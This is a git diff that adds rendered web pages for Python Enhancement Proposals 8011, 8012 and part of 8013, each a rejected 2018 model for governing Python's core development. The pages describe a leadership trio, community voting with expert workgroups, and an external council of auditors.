However, in the case of the GUIDO authoring a PEP, an impartial PEP Delegate should be selected and given the authority to accept or reject the PEP. The GUIDO should recuse themselves from the decision-making process. In the case of controversial PEPs where a clear consensus does not emerge, ultimate authority on PEPs authored by the GUIDO rests with the CoP.

+

The PEP process is further enhanced such that a core developer must always be chosen as the PEP Shepherd. This person ensures that proper procedure is maintained. The Shepherd must be chosen from among the core developers. This means that while anyone can author a PEP, all PEPs must have some level of sponsorship from at least one core developer.

+
+
+

Version History

+

Version 2

+
+
    +
  • Renamed to “The Technical Leader Governance Model”
  • +
  • “singular leader” -> “singular technical leader”
  • +
  • The adoption of PEP 8001 voting procedures is tentative until that +PEP is approved
  • +
  • Describe what happens if the GUIDO steps down
  • +
  • Recall votes require a super majority of core devs to succeed
  • +
+
+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-8010.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
\ No newline at end of file
diff --git a/pep-8011/index.html b/pep-8011/index.html
new file mode 100644
index 00000000000..5f56791e941
--- /dev/null
+++ b/pep-8011/index.html
@@ -0,0 +1,501 @@
PEP 8011 – Python Governance Model Lead by Trio of Pythonistas | peps.python.org
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 8011 – Python Governance Model Lead by Trio of Pythonistas

+
+
Author:
+
Mariatta <mariatta at python.org>, Barry Warsaw <barry at python.org>
+
Status:
+
Rejected
+
Type:
+
Informational
+
Topic:
+
Governance
+
Created:
+
24-Aug-2018
+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP proposes a governance model for the Core Python development community, +led by a trio of equally authoritative leaders. The Trio of Pythonistas +(ToP, or simply Trio) is tasked with making final decisions for the language. +It differs from PEP 8010 by specifically not proposing a central singular leader, +but instead a group of three people as the leaders.

+

This PEP also proposes the formation of specialized workgroups to assist the leadership trio in making decisions.

+

This PEP does not name the members of the Trio. Should this model be adopted, +it will be codified in PEP 13 along with the names of all officeholders +described in this PEP.

+

This PEP describes:

+
    +
  • The role and responsibilities of the Trio
  • +
  • Guidelines of how trio members should be formed
  • +
  • Reasoning of the group of three, instead of a singular leader
  • +
  • Role and responsibilities of Python core developers to the trio
  • +
  • Sustainability considerations
  • +
  • Diversity and inclusivity considerations
  • +
+
+
+

PEP Rejection

+

PEP 8011 was rejected by a core developer vote +described in PEP 8001 on Monday, December 17, 2018.

+

PEP 8016 and the governance model it describes were chosen instead.

+
+
+

Open discussion points

+

Various tweaks to the parameters of this PEP are allowed during the governance +discussion process, such as the exact responsibilities of the Trio, term lengths +of service, voting procedures, and trio disbandment. +These will be codified by the time the PEP is ready to be voted on.

+

It is allowed, and perhaps even expected, that as experience is gained with this +model, these parameters may be tweaked in order to provide for a smoother +governing process. The process for tweaking these parameters will generally +be the same voting process as described in PEP 8001.

+
+
+

Roles and responsibilities of the leadership trio

+
    +
  • Be open, considerate, respectful. In other words, adhere to The PSF’s code of conduct.
  • +
  • Pronounce on PEPs, either as a team, or individually if the other trio members agree.
  • +
  • Provide vision and leadership for Python, the programming language and the community.
  • +
  • Understand their own limitations, and seek advice whenever necessary.
  • +
  • Provide mentorship to the next generation of leaders.
  • +
  • Be a Python core developer
  • +
  • Be a voting member of The PSF (one of Contributing / Manager / Fellow / Supporter). [2]
  • +
  • Understand that Python is not just a language but also a community. They need to be aware of issues in Python, not just the technical aspects but also other issues in the community.
  • +
  • Facilitate the formation of specialized working groups within Core Python. +See “formation of specialized working groups” section below.
  • +
  • Set a good example of behavior, culture, and tone for the Python community. Just as Python looks at and learns from other communities for inspiration, other communities will look at Python and learn from us.
  • +
+
+
+

Authority of the trio

+

To be clear, in case any dispute arises: the trio has the final +authority to pronounce on PEPs (except for the governance PEP), to +decide whether a particular decision requires a PEP, and to resolve +technical disputes in general. The trio’s authority does not include +changing the governance itself, or other non-technical disputes that +may arise; these should be handled through the process described in +PEP 8001.

+
+
+

What are NOT considered as the role responsibilities of the trio

+

The following are not expected of the trio; however, they can do these things if they wish.

+
    +
  • They are not always the ones coming up with all the ideas, vision, problems to solve, and whatnot. The trio will be open to and accept suggestions from core developers and the community.
  • +
  • Day-to-day bug reports do not require the trio to intervene. Any core dev is able to make decisions, but will defer to the respective focused workgroups, and will eventually defer to the trio when there are major disagreements among core developers.
  • +
  • Does not run / decide on Python language summit and its logistics.
  • +
  • Does not run / decide on Python core sprint and its logistics.
  • +
  • Does not handle CoC cases. Those are responsibilities of the PSF CoC workgroup, but the trio will speak out if they witness those cases.
  • +
  • Does not make decisions about other Python implementations (Cython, IronPython, etc).
  • +
  • Does not run / decide on Python conferences and its logistics.
  • +
  • Not an evangelist of Python. The trio is not expected to preach/advertise for Python. They can if they want to, but are not expected to.
  • +
  • Not an educator of Python. The trio is not expected to be the ones teaching/writing about Python. They can if they want to, but are not expected to.
  • +
  • The trio is not expected to be available 24/7, 365 days a year. They are free +to decide for themselves their availability for Python.
  • +
  • Not a PEP editor.
  • +
+
+
+

Guidelines for the formation of the trio

+

The success of this governance model relies on the members of the trio, and the +ability of the trio members to collaborate and work well together.

+

The three people need to have a similar vision for Python, and each can have different skills that complement one another.

+

With such a team, disagreements and conflict should be rare, but they can still happen. We will need to trust that the people we select are able to resolve these among themselves.

+

When it comes to selecting the members of the trio, instead of nominating various individuals and choosing the top three, core developers will nominate trios and vote for groups of three whom they believe can form this united trio. There is no restriction that an individual can only be nominated in one slate.

+

This PEP will not name or nominate anyone into the trio.

+

Only once this PEP is accepted can any active core developer (who is eligible to vote) submit nominations of groups of three.

+

Once this PEP is accepted and core devs have submitted their nominations, voting +can begin, and the voting mechanism described in PEP 8001 will be used.

+

Qualities desired of the trio:

+
    +
  • Be a Python core developer.
  • +
  • Be a voting PSF member (one of Contributing / Manager / Fellow / Supporter). [2]
  • +
  • Be a member of the community with good standing.
  • +
  • Adhere to The PSF’s code of conduct (Be open, considerate, and respectful). [1]
  • +
  • Be willing to accept the said roles and responsibilities.
  • +
  • Able to communicate and articulate their thoughts effectively.
  • +
+

The following are not requirements when considering someone for the trio:

+
    +
  • “Experience being a BDFL of something” is not a requirement.
  • +
  • “Be a genius” is not a requirement.
  • +
+
+

Diversity and inclusivity

+

The core Python development team fully supports the Python Software Foundation’s diversity statement, and welcomes participation and contribution from people from diverse backgrounds. When nominating people to be part of the trio, Python core developers will make every effort to take members from underrepresented groups into consideration.

+

Ideally, nominations should include and reflect the diversity of core Python contributors.

+
+
+

Sustainability

+

Lack of employer support or lack of the luxury of free time should not be a factor when identifying who should be in a trio. If there are individuals whom the core devs have identified as having the necessary skills for being a member of the trio, but who are unable to do it because of lack of time or financial support, then we should open discussions with The PSF or other parties about providing the needed support.

+
+
+

Additional guidelines

+

When nominating someone other than yourself, please first ask privately if they are ok with being nominated, and if they are ok with being nominated in that group of three. This is so people don’t feel pressured to accept a nomination just because it happens publicly.

+
+
+
+

Why not another governance model

+

The core Python community has been familiar with the singular BDFL model for over two decades; it is a model that has “worked” for Python. Shifting to a completely different model all of a sudden could be disruptive to the stability of the community. However, the community can continue to evolve in the future.

+

If this PEP is chosen, it is not meant to be the only governance model for Python +going forward.

+

This PEP proposes a transition to a community led by a group of people (although small), while also introducing the concept of additional specialized workgroups.

+
+
+

Why not more than three

+

Too many chefs spoil the soup.

+

The goal of having a leadership team is for Python core developers to be able to come to consensus and decisions. The larger the leadership team, the more difficult it is to come to a decision.

+

This is also for the benefit of the members of the trio. Learning to collaborate with other people in a team is not something that happens organically, and it takes a lot of effort. It is expected that members of the trio will be part of the team for a long-term period. Having to deal with two other people is probably difficult enough. We want the trio to be able to carry out their duties and responsibilities as efficiently as possible.

+

The more people in the group, the more difficult it is to find time to meet, discuss, and come to a decision.

+
+
+

Roles and responsibilities of Python Core Developers to the trio

+
    +
  • Be open, considerate, and respectful. In other words, adhere to The PSF’s Code of Conduct
  • +
  • Decisions and pronouncements made by individual members of the trio are to +be seen as authoritative and coming from the trio.
  • +
  • Once the trio has pronounced a decision, core devs will be supportive, even if they were not supportive in the beginning (before the trio made the decision)
  • +
  • Continue with day-to-day decision making in the bug tracker, and defer to the +trio if there is major disagreement
  • +
  • Python core developers do not handle CoC cases; those are responsibilities of the CoC workgroup, but core developers will speak out if they witness those cases
  • +
  • Be aware that they are part of the larger Python community, not just the technical aspect of it.
  • +
  • Be a voting PSF member (one of Contributing / Manager / Fellow / Supporter).
  • +
  • Set a good example of behavior, culture, and tone for the Python community.
  • +
+
+
+

Term Limit

+

The trio is not expected to serve for life; however, a longer term is desired. The purpose of longer-term service is to avoid the unnecessary churn of needing to “elect”, and to provide stability and consistency in the language and the community.

+

Currently, Python release managers hold their position for 5 years (one release +cycle), and that seems to work so far. Therefore, this PEP proposes that the +trio hold their position for 5 years.

+
+
+

Succession planning of the trio (open for discussion)

+

The trio should notify core devs of their intention to disband/retire/quit from their roles at least one year in advance, to allow them to actively mentor and train the next generation of successors, and to avoid a power vacuum.

+

The trio do not necessarily have to be the ones choosing who the next leaders will +be.

+

This PEP does not enforce that the same governance model be chosen for the next generation. Python as a language and community can continue to evolve. By giving one year’s advance notice to disband, the trio is giving the core Python community an opportunity to reflect on the success/failure of this governance model, and to choose a different governance model if needed.

+

However, the next governance model and leaders should be chosen/elected within +one year after the trio announced their desire to disband.

+

If it is decided to continue with this model of governance, the next generation of the trio will be nominated and elected similarly to how the first trio was nominated/chosen.

+

The trio should act as advisor/mentor to the next generation of chosen leaders for at least X months.

+

Since future trios will be chosen from among Python core developers, it makes sense for future Python core developers to possess some, but not necessarily all, of the qualities of the trio as laid out in this PEP.

+

Therefore, the guidelines for selecting trio members can also be used +as guidelines when identifying future Python core developers.

+
+

Scenario if one member of the trio needs to quit

+

Effective governance models provide off-ramps or temporary breaks for leaders +who need to step down or pause their leadership service.

+

What if one member of the chosen trio has to quit, for unforeseen reasons?

+

There are several possible options:

+
    +
  • The remaining duo can select another member to fill in the role
  • +
  • The trio can choose to disband, core developers can nominate other trios
  • +
  • Core developers can choose a different governance model
  • +
+

Since the trio was elected as a slate, the loss of one member breaks the unit that was elected. Therefore, a new election should be held.

+
+
+
+

Formation of working groups/area of expertise/ownership (previously BDFL delegate)

+

(Open for discussion).

+

Certain areas and topics of Core Python and the Python community require leaders with specialized skills. It is recommended that there be several working groups with more authority in their specific areas to assist the trio in making decisions.

+

The role of these “specialized work groups/council” is to be the final decision +maker for controversial discussions that arise in their respective areas.

+

These working groups should be small (3-5 people), for similar reasons that the +leadership trio is a small group.

+

These working groups should consist of both Python core developers and external experts. This is to ensure that decisions made do not favor only Python core developers.

+

Python core developers will defer decisions to these working groups on their respective topics. However, these groups will answer/defer to the trio.

+

These working groups can be selected, and their members voted on, only after this PEP is accepted.

+

If this PEP is accepted, the working group can be decided within a year or two +after the PEP’s acceptance.

+

When selecting members of these special work groups, the trio will make every effort to take members from underrepresented groups into consideration. Ideally, the workgroup members should include and reflect the diversity of the wider Python community.

+

Members of these workgroups do not need to be Python core developers, but they need to be at least basic members of the PSF [2].

+

These workgroups are active as long as the trio is active.

+

Several suggested working groups to start:

+
    +
  • Documentation of CPython
  • +
  • Security of CPython
  • +
  • Performance of CPython
  • +
+

The workgroups can be seen as having a similar role to the previously known role of “BDFL-delegate” or PEP czar. The difference is that, instead of appointing a single person as decision maker, there will be a small team of decision makers.

+

Another difference from the previous “BDFL-delegate” role is that the group can be active as long as the trio is active, as opposed to only when there is a PEP that requires their expertise.

+

When the trio disbands, these workgroups are disbanded too.

+
+

Why these workgroups are necessary

+

This is an effort to ‘refactor the large role’ of the previous Python BDFL.

+
+
+
+

Affirmation as being a member of the PSF

+

This PEP proposes that core developers and the trio members self-certify +themselves as being a member of The PSF.

+

Being part of the PSF means being part of the Python community, and supporting The PSF’s mission and diversity statement.

+

By being a member of The PSF, Python core developers declare their support for +Python and agree to the community Code of Conduct.

+

For more details of The PSF membership, see: PSF Membership FAQ [2].

+
+
+

Reasoning for choosing the name trio

+

Not to be confused with Python trio (an async library).

+

The “trio” is short and easy to pronounce, unlike other words that are +long and can have negative interpretations, like triad, trinity, triumvirate, +threesome, etc.

+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-8011.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
\ No newline at end of file
diff --git a/pep-8012/index.html b/pep-8012/index.html
new file mode 100644
index 00000000000..14523e28d72
--- /dev/null
+++ b/pep-8012/index.html
@@ -0,0 +1,605 @@
PEP 8012 – The Community Governance Model | peps.python.org
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 8012 – The Community Governance Model

+
+
Author:
+
Łukasz Langa <lukasz at python.org>
+
Status:
+
Rejected
+
Type:
+
Informational
+
Topic:
+
Governance
+
Created:
+
03-Oct-2018
+
+
+
+
Table of Contents +
+
+

PEP Rejection

+

PEP 8012 was rejected by a core developer vote +described in PEP 8001 on Monday, December 17, 2018.

+

PEP 8016 and the governance model it describes were chosen instead.

+
+
+

Abstract

+

This PEP proposes a new model of Python governance based on consensus +and voting by the Python community. This model relies on workgroups to carry +out the governance of the Python language. This governance model works without +the role of a centralized singular leader or a governing council.

+

It describes how, when, and why votes are conducted for decisions affecting +the Python language. It also describes the criteria for voting eligibility.

+

Should this model be adopted, it will be codified in PEP 13.

+

This model can be affectionately called “The Least Worst Governance +Model” by its property that while far from ideal, it’s still the most +robust one compared to the others. Since avoiding issues inherent to +the other models is a paramount feature of the Community Governance +Model, we start the discussion a bit unusually: by rejecting the +other models.

+
+
+

Rejected Models

+
+

Let’s have another BDFL

+

This seems like a very attractive idea because it’s a model we know. +One Dictator to rule us all.

+
+

Challenge: There is no other Guido

+

There is no other single person with the unique skillset of Guido van +Rossum. Such a person would need to have the technical, communication, and +organizational experience to lead the project successfully. Specifically, the +person would need to:

+
    +
  • set and articulate a cohesive long-term vision for the project;
  • +
  • possess deep technical understanding of the runtime, the standard library, +and the wider third-party library context;
  • +
  • negotiate and resolve contentious issues in ways acceptable to all +parties involved;
  • +
  • have free time and possess the energy to sustain continuous involvement +over periods of years.
  • +
+
+
+

Risk: Malevolent Dictator For Life

+

What if we got somebody who is not as well suited for the position as +our first Dictator? There are possible scenarios in which this could +lead to severe consequences.

+

The Dictator could gather insufficient trust due to missing technical +depth, a “close” election, inconsistent vision, poor ability to deal +with conflict or burnout, and so on. Given a controversial decision +decided by the Dictator in a specific way, a Dictator with +insufficient trust may cause a split within the project.

+

The Dictator setup invites lobbying concentrated on a single person. +Unless that person is immune to leverage due to wealth, health, and +a stable life situation, this poses risk of malicious actors steering +the project from behind the curtain.

+

Finally, the Dictator coming from a particular part of the community +may put more weight on the needs and interests of that particular part +of the user base, alienating others.

+
+
+

Observation: We don’t actually need a Dictator

+

The irony of the Dictator model is that it requires an election. Better +yet, we need an election to even decide on which governance model to +use.

+

If we are already able to solve two problems of this gravity via the community process, why not keep using it for all subsequent decisions?

+
+
+

Risk: The warm and fuzzy feeling of a vague proposal

+

One last thing worth mentioning is that when a BDFL model is suggested, +it’s easy to bypass the criticism above by not mentioning who the BDFL +should be. That way the hopeful reader can project their best +expectations and wants onto the abstract BDFL, making the idea appear +more attractive. This is a mistake.

+

Without naming the BDFL in the model proposal we are not talking about +a concrete model. We can avoid asking and answering the hard questions. +We can imagine our best-case scenario, a candidate we’d like to serve +the role.

+

Omitting a name for the BDFL also puts the Community Model at an unfair disadvantage. +We already know the good, the bad, and the ugly of our core developer +group. It’s no platonic ideal, no perfect sphere with no friction. In +fact, we expect there to be a fair amount of friction and imperfections.

+

Thus, to fairly assess the BDFL model proposal, dear reader, you +should imagine the worst possible person within our team as that +BDFL. A concrete human being. Imagine it’s me.

+

Conclusion: While this has been our history, without Guido, this model does not serve the best interests of the language into the future.

+
+
+
+

Let’s have a Council

+

This group of people roughly shares the responsibilities of a Dictator. The +group can also be called a Triumvirate, a Quorum, Elders, Steering Committee, +and so on.

+
+

Risk: Dilution and confusion

+

This model favors a small group, between three and five people. +That way it shares most of the criticism with the Dictator model, +amplified. Having not one but, say, three people in position of power +dilutes responsibility while still providing high risk of lobbying, +insufficient trust, or alienating parts of the community.

+
+
+

Risk: Internal Conflict

+

Additionally, having multiple people share the responsibility of +governance creates ample opportunity for internal conflict, +inconsistent long-term vision of the project, and multiplies the +required continuous time involvement by its members (it’s no Quorum +if they can’t “reach quorum” due to other time commitments).

+

Just like with a frictionless spherical BDFL, reject ideas of Councils without considering how it would work for you if that Council consisted of three people you find inadequate for the role. Imagine if I had two friends.

+

Most importantly, just like with a Dictator, we don’t need a Council. +By the time we had one, we would have already had two successful +elections. Why not keep voting?

+

Conclusion: This model has risks similar to those of a Dictator, only worse.

+
+
+
+
+

Motivation

+

Now that we have rejected the basics of other governance models, let’s talk about why we even need a governance model on top of a loosely defined group of committers.

+

Stability and Reliability: We want to prevent single committers from making wide-reaching changes that impact the future of the language or its usability. Coherent vision and backwards compatibility are important in any programming language, but they are doubly important for Python, which is very dynamic (e.g. has very complex backwards compatibility implications).

+

Diverse Uses of Python: Moreover, Python is used by a diverse group of users, from school children through scientists to corporations with multi-million line codebases. We want to include all our varied audiences.

+

Vitality: We want to avoid stagnation. Python is a mature project but it needs to keep evolving to stay relevant, both the runtime and the programming language. To do that, people interested in improving a particular part of the project should be able to do so without needless friction. But for substantial changes, we want some discourse and reflection to ensure the changes are wise.

+
+
+

Rationale

+

Inclusive: The Community Model is the most inclusive model. No single person or small group of people is in a distinguished position of power over others. Contributors and any workgroups in this model are self-selecting.

+

Pragmatic: This model ensures no user group is put at a disadvantage due to the interests of a single person or a small group of people.

+

Proven: This model works. There are a number of large open-source projects run this way (two of which, Rust and Django, are described in PEP 8002). ECMAScript and C++ are similarly developed.

+
+
+

Specification

+
+

Key people and their functions

+
+

The core team

+

The Python project is developed by a team of core developers. +While membership is determined by presence in the “Python core” team +in the “python” organization on GitHub, contribution takes many forms:

+
    +
  • committing changes to the repository;
  • +
  • reviewing pull requests by others;
  • +
  • triaging bug reports on the issue tracker;
  • +
  • discussing topics on official Python communication channels.
  • +
+

Some contributors may be considered dormant; in other words, they did not contribute to the last two releases of CPython. Any dormant contributor can at any time resume contribution.

+
+
+

Experts

+

The Python Developer’s Guide lists a number of interest areas along with +names of core developers who are recognized as experts in the given +area. An expert or a sub-team of experts has the following +responsibilities:

+
    +
  • responding to issues on the bug tracker triaged to the given interest +area on a timely basis;
  • +
  • reviewing pull requests identified as belonging to the given interest +area on a timely basis;
  • +
  • overseeing cohesive design in the evolution of the given interest area.
  • +
+

A core developer can assign and unassign themselves at will to +a given interest area. Existing experts listed for the given interest +area must be made aware of this change and have to unanimously agree to +it.

+

If a given interest area lists multiple experts, they form a sub-team +within the core team. They are responsible for the given interest area +together.

+

A core developer should avoid membership as an expert in too many +interest areas at the same time. This document deliberately doesn’t +specify a maximum number, it simply signals that overexertion leads to +burnout and is a risk to the project’s ability to function without +a given contributor.

+
+
+

Moderators

+

There is a group of people, some of whom are not core developers, responsible for ensuring that discussions on official communication channels adhere to the Code of Conduct. They take action in response to violations.

+
+
+
+

Regular decision process

+

Primary work happens through bug tracker issues and pull requests. Core developers should avoid pushing their changes directly to the cpython repository, instead relying on pull requests. Approval of a pull request by a core developer allows it to be merged without further process.

+

Notifying relevant experts about a bug tracker issue or a pull request is important. Reviews from experts in the given interest area are strongly preferred, especially on pull request approvals. Failure to do so might result in the change being reverted by the relevant expert.

+

Experts are not required to listen to the firehose of GitHub and bug +tracker activity at all times. Notifying an expert explicitly during +triage or bug/pull request creation may be necessary to get their +attention.

+
+
+

Controversial decision process

+

Substantial changes in a given interest area require a PEP. This +includes:

+
    +
  • Any semantic or syntactic change to the language.
  • +
  • Backwards-incompatible changes to the standard library or the C API.
  • +
  • Additions to the standard library, including substantial new +functionality within an existing library.
  • +
  • Removing language, standard library, or C API features.
  • +
+

Failure to get a substantial change through the PEP process might result in the change being reverted.

+

Changes that are bug fixes can be exempt from the PEP requirement. Use +your best judgement.

+
+

PEP, Enhanced

+

The PEP process is augmented with the following changes and clarifications +over information already present in PEP 1:

+
    +
  • PEPs are not merged until the final decision is made on them; they are +open pull requests on GitHub until that moment;
      +
    • to make review easier, all changes to the PEP under review should be +made as separate commits, allowing for granular comparison;
    • +
    +
  • +
  • a submitted PEP needs to identify the area of interest and relevant +experts as the body that makes the final decision on it;
  • +
  • if the PEP author is one of the experts of the relevant area of +interest, they must name another person from outside of that interest +area to contribute to the final decision in their place;
  • +
  • the PEP author is responsible for gathering and integrating feedback +on the PEP using the official communication channels, with the goal of +building consensus;
  • +
  • all community members must be enabled to give feedback;
  • +
  • at some point, one of the named experts posts a “summary comment” that +lays out the current state of discussion, especially major points of +disagreement and tradeoffs; at the same time the expert proposes +a “motion for final comment period” (FCP), along with a proposed +disposition to either:
      +
    • accept;
    • +
    • accept provisionally;
    • +
    • reject; or
    • +
    • defer the PEP.
    • +
    +
  • +
  • to enter the FCP, the PEP must be signed off by all experts of the +relevant area of interest;
  • +
  • the FCP lasts for fourteen calendar days to allow stakeholders to file +any final objections before a decision is reached.
  • +
+
+
+

Very controversial PEPs

+

If a core contributor feels strongly against a particular PEP, during +its FCP they may raise a motion to reject it by vote. Voting details +are described below in “Voting Mechanics”.

+

This should be a last resort and thus a rare occurrence. It splits the core team and is a stressful event for all involved. However, the experts filing for an FCP for a PEP should have a good sense of whether a motion to reject it by vote is likely. In such a case, care should be taken to avoid prematurely filing for an FCP.

+

There is no recourse for the opposite situation, i.e. when the +experts want to reject a PEP but others would like it accepted. This +ensures that the relevant experts have the last say on what goes in. +If you really want that change, find a way to convince them.

+

Moderators on official communication channels enforce the Code of +Conduct first and foremost, to ensure healthy interaction between all +interested parties. Enforcement can result in a given participant +being excluded from further discussion and thus the decision process.

+
+
+

Revisiting deferred and rejected PEPs

+

If a PEP is deferred or rejected, the relevant experts should be +contacted first before another attempt at the same idea is made. +If the experts agree there is substantial evidence to justify +revisiting the idea, a pull request editing the deferred or rejected +PEP can be opened.

+

Failure to get proper expert buy-in beforehand will likely result in +immediate rejection of a pull request on a deferred or rejected PEP.

+
+
+
+

Other Voting Situations

+
+

Nominating a new core developer

+

A champion nominates a person to become a new core developer by posting +on official communication channels. A vote is opened.

+

If any existing core developer does not feel comfortable with the nominee +receiving the commit bit, they should preferably address this concern in +the nomination thread. If there is no satisfactory resolution, they can +cast a negative vote.

+

In practice, a nomination for core developer should often be met with surprise by others that this person is not a core developer yet. In other words, it should be done when the candidate is already known and trusted well enough by others. We should avoid nominations based on potential.

+
+
+

Votes of no confidence

+
    +
  • Removing a core developer from the core team;
  • +
  • Disbanding the experts team for a given area of interest.
  • +
+

Those describe a situation where a core developer is forcefully +removed from the core team or an experts team is forcefully disbanded. +Hopefully those will never have to be exercised but they are explicitly +mentioned to demonstrate how a dysfunctional area of interest can be +healed.

+

If a core developer is removed by vote from the core team, they lose +the ability to interact with the project. It’s up to the Moderators’ +discretion to remove their ability to post on the bug tracker and GitHub +or just moderate their future behavior on a case-by-case basis.

+

If the experts team for an area of interest is disbanded, other core +developers can step up to fill the void at will. Members of the +disbanded experts team cannot self-nominate to return.

+
+
+
+

Voting Mechanics

+

All votes described in this document are +1/-1/0 (“Yea”/“Nay”/“Present”) recorded votes. There are no other vote values; in particular, values out of range or fractions (like +0.5) are invalid.

+

Votes take fourteen calendar days. The starting date is determined according to the timezone of the person who filed the motion to vote. The end date is fourteen days later, Anywhere-On-Earth.

+
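As a hedged illustration of this window, assuming the common convention that “Anywhere-On-Earth” means UTC-12 (the PEP itself does not define the term):

    # Hypothetical sketch: computing when a vote closes, assuming
    # "Anywhere-On-Earth" is the usual UTC-12 convention.
    from datetime import date, datetime, time, timedelta, timezone

    AOE = timezone(timedelta(hours=-12))

    def vote_closes(start_day: date) -> datetime:
        # start_day is the calendar date in the timezone of the person
        # who filed the motion; the vote closes at the end of the day
        # fourteen days later, Anywhere-On-Earth.
        return datetime.combine(start_day + timedelta(days=14),
                                time(23, 59, 59), tzinfo=AOE)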

Dormant core developers as defined in “Key people and their functions” +above are not counted towards the totals if they abstain. However, they +can vote if they choose to do so and that way they count as active. +Voting is a form of contribution.

+

Voting is done by a commit to a private repository in the “python” +organization on GitHub. The repository is archived and publicized after +the voting period is over. The repository’s name should start with +“vote-“.

+

Changes to one’s vote during the voting period are allowed. Peeking at other developers’ cast votes during the time of the vote is possible.

+

Every situation requires a different vote percentage (a short tallying sketch in Python follows the list):

+
    +
  • PEP rejection by vote requires over 1/3rd of the non-dormant core +developer population to explicitly vote to reject. Note that if +more than 1/3rd of core developers decide against a PEP, this means +there exists no super-majority of core developers who are in favor +of the change. This strongly suggests the change should not be made +in the shape described by the PEP.
  • +
  • New core developer nomination requires there to be no votes cast +against it.
  • +
  • Votes of no confidence require a super-majority of at least 2/3rds of +the non-dormant core developer population to explicitly vote in favor +of the motion.
  • +
+
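A minimal, hedged sketch of these three thresholds (the function names are illustrative; the PEP specifies no implementation):

    # `votes` maps a core developer's name to their recorded vote:
    # +1, -1, or 0. `population` is the number of non-dormant core
    # developers, counting any dormant developers who chose to vote
    # (voting is a form of contribution and makes them active).

    def pep_rejected_by_vote(votes, population):
        # Rejection needs strictly more than 1/3 of the population
        # to explicitly vote -1.
        nays = sum(1 for v in votes.values() if v == -1)
        return 3 * nays > population

    def nomination_passes(votes):
        # A new core developer nomination requires zero votes cast
        # against it.
        return all(v != -1 for v in votes.values())

    def no_confidence_passes(votes, population):
        # A vote of no confidence needs at least 2/3 of the
        # population to explicitly vote +1.
        yeas = sum(1 for v in votes.values() if v == +1)
        return 3 * yeas >= 2 * population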
+
+
+

Omissions

+

This document deliberately omits listing possible areas of interest within the project. It also does not address the election and management of Moderators, which are done by the Python Software Foundation and its Code of Conduct Working Group, which can be contacted by mailing conduct-wg@python.org.

+
+
+

Acknowledgements

+

Thank you to the authors of PEP 8002, which was a helpful resource in shaping this document.

+

Thank you to Alex Crichton and the Rust team for a governance model +that was a major inspiration for this document.

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-8012.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
diff --git a/pep-8013/index.html b/pep-8013/index.html new file mode 100644 index 00000000000..81cad20f79b --- /dev/null +++ b/pep-8013/index.html @@ -0,0 +1,464 @@ PEP 8013 – The External Council Governance Model | peps.python.org
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 8013 – The External Council Governance Model

+
+
Author:
+
Steve Dower <steve.dower at python.org>
+
Status:
+
Rejected
+
Type:
+
Informational
+
Topic:
+
Governance
+
Created:
+
14-Sep-2018
+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP proposes a new model of Python governance based on a Council +of Auditors (CoA) tasked with making final decisions for the language. +It differs from PEP 8010 by specifically not proposing a central +singular leader, and from PEP 8011 by disallowing core committers from +being council members. It describes the size and role of the council, +how the initial group of council members will be chosen, any term +limits of the council members, and how successors will be elected.

+

It also spends significant time discussing the intended behaviour of +this model. By design, many processes are not specified here but are +left to the people involved. In order to select people who will make +the best decisions, it is important for those involved to understand +the expectations of the CoA but it is equally important to allow the +CoA the freedom to adjust process requirements for varying +circumstances. This only works when process is unspecified, but all +participants have similar expectations.

+

This PEP does not name the members of the CoA. Should this model be +adopted, it will be codified in PEP 13 along with the names of all +officeholders described in this PEP.

+
+
+

PEP Rejection

+

PEP 8013 was rejected by a core developer vote +described in PEP 8001 on Monday, December 17, 2018.

+

PEP 8016 and the governance model it describes were chosen instead.

+
+
+

The Importance of the Grey Area

+

In any actual decision-making process, there is going to be grey area. +This includes unexpected scenarios, and cases where there is no +“correct” answer.

+

Many process plans attempt to minimise grey area by defining processes +clearly enough that no flexibility is required.

+

This proposal deliberately goes the other way. The aim is to provide a +robust framework for choosing the best people to handle unexpected +situations, without defining how those people should handle those +situations.

+

Examples are provided of “good” responses to some situations as an +illustration. The hope is that the “best” people are the best because +they would live up to those examples. The process that is proposed has +been designed to minimise the damage that may be caused when those +people turn out not to be the best.

+

Grey area is guaranteed to exist. This proposal deliberately embraces +and works within that, rather than attempting to prevent it.

+
+
+

Model Overview

+
+

Key people and their functions

+

The Council of Auditors (CoA) is a council of varying size, typically +two to four people, who are elected for the duration of a Python +release. One member of the CoA is considered the President, who has +some minor points of authority over the other members.

+

The CoA has responsibility for reviewing controversial decisions in +the form of PEPs written by members of the core development team. The +CoA may choose to accept a PEP exactly as presented, or may request +clarification or changes. These changes may be of any form and for any +reason. This flexibility is intentional, and allows the process to +change over time as different members are elected to the CoA. See the +later sections of this document for examples of the kinds of requests +that are expected.

+

The CoA only pronounces on PEPs submitted to python-committers. There +is no expectation that the CoA follows or participates on any other +mailing lists. (Note that this implies that only core developers may +submit PEPs. Non-core developers may write and discuss proposals on +other mailing lists, but without a core developer willing to support +the proposal by requesting pronouncement, it cannot proceed to +acceptance. This is essentially the same as the current system, but is +made explicit here to ensure that members of the CoA are not expected +to deal with proposals that are not supported by at least one core +developer.)

+

The CoA may not delegate authority to individuals who have not been +elected by the core developer team. (One relevant case here is that +this changes the implementation of the existing BDFL-Delegate system, +though without necessarily changing the spirit of that system. See the +later sections, particularly example scenario four, for more +discussion on this point.)

+

The Release Manager (RM) is also permitted to request changes on any PEPs that specify the release they are responsible for. After feature freeze, the RM retains this responsibility for their release, while the CoA rotates and begins to focus on the subsequent release. This is no different from the current process. The process for selecting an RM is not changed in this proposal.

+

Core developers are responsible for electing members of the CoA, and +have the ability to call a “vote of no confidence” against a member of +the CoA. The details of these votes are discussed in a later section.

+

Where discussions between core developers and members of the CoA +appear to be ongoing but unfruitful, the President may step in to +overrule either party. Where the discussion involves the President, it +should be handled using a vote of no confidence.

+

Members of the CoA may choose to resign at any point. If at least two +members of the CoA remain, they may request a new election to refill +the group. If only one member remains, the election is triggered +automatically. (The scenario when the President resigns is described +in a later section.)

